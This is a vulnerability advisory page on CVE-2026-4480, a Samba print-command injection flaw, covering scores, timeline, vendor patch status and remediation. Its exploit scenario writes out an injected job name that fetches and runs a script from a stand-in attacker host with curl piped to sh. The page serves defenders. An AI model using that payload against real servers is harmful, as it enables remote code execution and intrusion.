What is the CVSS score of CVE-2026-4480?

CVE-2026-4480 has a CVSS 3.1 base score of 9.0 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H. EPSS exploitation probability: 0.1%.

Which versions of Samba are affected by CVE-2026-4480?

A critical remote code execution vulnerability in Samba's printing subsystem (CVE-2026-4480, CVSS 9.0) could allow attackers to execute arbitrary commands on affected print servers.. A patch is available.

How to fix or mitigate CVE-2026-4480?

24 hours: Identify and catalog all Samba systems with print services enabled, particularly those exposed to external or untrusted networks. 7 days: Test and deploy vendor-released patch to non-production Samba print systems; validate service availability and functionality. 30 days: Complete patch deployment to all production Samba print servers.

Samba CVE-2026-4480

EUVD-2026-31828 CRITICAL

OS Command Injection (CWE-78)

2026-05-26 redhat

GHSA-hwwh-4hhw-h9jf

RCE Command Injection Red Hat Enterprise Linux 10 Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 9 Red Hat Openshift Container Platform 4

9.0

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

9.0 CRITICAL

AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

SUSE

8.5 HIGH

AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Red Hat

8.5 HIGH

qualitative

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

High

Privileges Required

None

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Analysis Generated

Jun 08, 2026 - 08:36 vuln.today

Severity Changed

Jun 03, 2026 - 09:22 NVD

HIGH CRITICAL

CVSS changed

Jun 03, 2026 - 09:22 NVD

8.5 (HIGH) 9.0 (CRITICAL)

CVE Published

May 26, 2026 - 13:56 nvd

CRITICAL 9.0

DescriptionCVE.org

A flaw was found in the Samba printing subsystem. Samba passes the client-controlled job description string to the command configured with the "print command" setting via the "%J" substitution character without escaping shell meta characters. A remote attacker could exploit this vulnerability by sending a specially crafted print job description that contains unescaped shell characters. This could lead to remote code execution on the affected system.

AnalysisAI

Remote code execution in Samba's printing subsystem allows remote attackers to inject arbitrary shell commands via crafted print job descriptions. The flaw stems from unescaped expansion of the client-controlled '%J' substitution token into the configured 'print command', enabling shell metacharacter injection. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Identify Samba host with printing enabled

Delivery

Connect to SMB service on TCP/445

Exploit

Submit print job with shell metacharacters in description

Execution

Samba expands %J into print command unescaped

Persist

Shell executes injected payload as smbd user

Impact

Establish foothold and pivot internally

Access

Identify Samba host with printing enabled

Delivery

Connect to SMB service on TCP/445

Exploit

Submit print job with shell metacharacters in description

Execution

Samba expands %J into print command unescaped

Persist

Shell executes injected payload as smbd user

Impact

Establish foothold and pivot internally

Vulnerability AssessmentAI

Exploitation	The target must be running Samba with the printing subsystem enabled and a 'print command' configured that uses the '%J' substitution token (the default on many distributions when printing is active), and the attacker must be able to reach the SMB service (typically TCP/445) and submit a print job - no authentication is required per the CVSS vector (PR:N), though many real deployments restrict print queues to authenticated users which would raise the bar. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	Signals conflict and require weighing in context. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker reachable on TCP/445 connects to a Samba server with printing enabled and submits a print job whose job description contains shell metacharacters, for example a job named '; curl http://attacker/x \| sh ;'. When Samba expands %J into the configured print command and invokes the shell, the injected payload executes as the smbd process user, giving the attacker a foothold from which to escalate or pivot. …
Remediation	Apply the vendor-released patches for your distribution as the primary fix: Red Hat customers should install updates per RHSA-2026:22644 and RHSA-2026:22963, SUSE customers via SUSE-SU-2026:2071 through 2108, and Ubuntu users via USN-8306-1; exact fixed package versions are not enumerated in the supplied data and should be read from each advisory before deployment. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Identify and catalog all Samba systems with print services enabled, particularly those exposed to external or untrusted networks. …

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-11788 HIGH This Week

7.5 Jun 09

Remote denial of service in 389 Directory Server (Red Hat Directory Server 11/12/13 and Red Hat Enterprise Linux 6 throu

CVE-2026-48914 MEDIUM This Month

6.7 Jun 12

Out-of-bounds heap write in QEMU's virtio-blk device allows a high-privileged guest to crash the host QEMU process. The

CVE-2026-11789 MEDIUM This Month

6.5 Jun 09

Denial-of-service in Red Hat's 389 Directory Server allows a highly privileged network attacker to crash the LDAP servic

CVE-2026-11786 MEDIUM This Month

6.5 Jun 09

Out-of-bounds read in 389 Directory Server's LDIF parser exposes limited heap memory to a highly privileged local attack

CVE-2026-11611 MEDIUM This Month

6.5 Jun 08

Denial of service in Red Hat 389 Directory Server's Content Synchronization persistent search plugin enables authenticat

Vendor StatusVendor

SUSE

Severity: High

Product	Status
Image SLES12-SP5-Azure-BYOS Image SLES12-SP5-Azure-Standard-On-Demand Image SLES12-SP5-EC2-BYOS Image SLES12-SP5-EC2-ECS-On-Demand Image SLES12-SP5-EC2-On-Demand Image SLES12-SP5-GCE-BYOS Image SLES12-SP5-GCE-On-Demand	Affected
Image SLES15-SP7-HPC-Azure	Affected
SUSE Enterprise Storage 7.1	Fixed
SUSE Linux Enterprise Desktop 15 SP7 SUSE Linux Enterprise High Performance Computing 15 SP7 SUSE Linux Enterprise Module for Basesystem 15 SP7 SUSE Linux Enterprise Server 15 SP7 SUSE Linux Enterprise Server for SAP Applications 15 SP7	Fixed
SUSE Linux Enterprise High Availability Extension 12 SP5	Fixed

CVE-2026-4480 vulnerability details – vuln.today

Back

Samba CVE-2026-4480

Severity by source

CVSS VectorNVD

Lifecycle Timeline

DescriptionCVE.org

AnalysisAI

Unlock full vulnerability intelligence

Attack ChainAIDerived

Vulnerability AssessmentAI

Recommended ActionAI

More from same product – last 7 days

Vendor StatusVendor

SUSE

Share

External POC / Exploit Code